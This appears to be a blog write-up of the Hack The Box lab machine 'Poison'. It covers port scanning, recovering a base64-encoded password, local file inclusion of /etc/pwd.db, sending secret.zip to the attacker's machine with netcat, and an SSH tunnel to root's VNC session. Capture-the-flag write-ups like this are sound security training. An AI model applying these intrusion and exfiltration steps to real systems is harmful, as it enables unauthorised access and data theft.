HTB – Poison – 10.10.10.84

Posted by

This is another one I intend to “rewrite”, but posting here so I can get to work on it later this week. 

Run NMAP: root@kali:~# nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.84

This type of nmap scan prints verbose output, runs stealth syn scan, T4 timing (quicker), OS and version detection + full port range scan.

The results of this scan indicate only 1 open ports, and ALL other ports are closed. The open port is:

22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

It’s a web server, so let’s visit the webpage.

It leads us to a “temporary website” that someone has created to test local .php scripts.

My initial instinct is to try all of these scripts and see what sticks out…

info.php:

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017

root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

listfiles.php:

Array ( [0] => .[1] => .. [2] => browse.php [3] => index.php [4] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] pwdbackup.txt )

So, this shows some files that aren’t listed on the front page. Especially interesting is pwdbackup.txt.

Phpinfo.php is the build information for PHP Version 5.6.32. 

I want to look further at pwdbackup.txt. I enter that into the scriptname field and get the following output:

Poison1.png

What could go wrong, indeed!

I ran this through Base64 decoder x 13 times, and received the password Charix!2#4%6&8(0.  I’m assuming Charix is the username, and step 5 will confim that.

ssh charix@10.10.10.84

Entered password, cat user.txt, done.

I also noticed that this web address seems vulnurable to local file inclusion (LFI) vulnurability.  Use of file= suggests I can probably try to access files other than just those listed.  I know the OS is FreeBSD, and a quick google search turns up that the passwd file in FreeBSD is actually in /etc/pwd.db, not etc/passwd.  I try a few variations of ../../etc/pwd.db but it turns out that all I need to access this file is “file=/etc/pwd.db”

There is also a secret.zip file on the desktop that is password protected. I need to transfer it to my attack machine in order to crack it.

On my attack machine:

nc -l -p 1234 > secret.zip to create a file for it to dump into.

On the victim machine:

Nc –w 3 10.10.14.13 1234 < secret.zip

I’m going to attempt to crack the password with fcrackzip.

Secret.zip doesn’t have a crazy password to crack. Just use Charix’s password.

VNC is running on the server

SSH tunnelling to connect:
root@Kali:~# ssh -L 5901:localhost:5901 charix@10.10.10.84

Using the VNC Gui doesn’t work, use (in another terminal):
root@Kali:~# vncviewer 127.0.0.1:5901 -passwd /root/Desktop/htb/poison/secret

5902 would have been Charix’s desktop. Poison:2 suggests that. 5901 would be the other VNC running, which is root.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s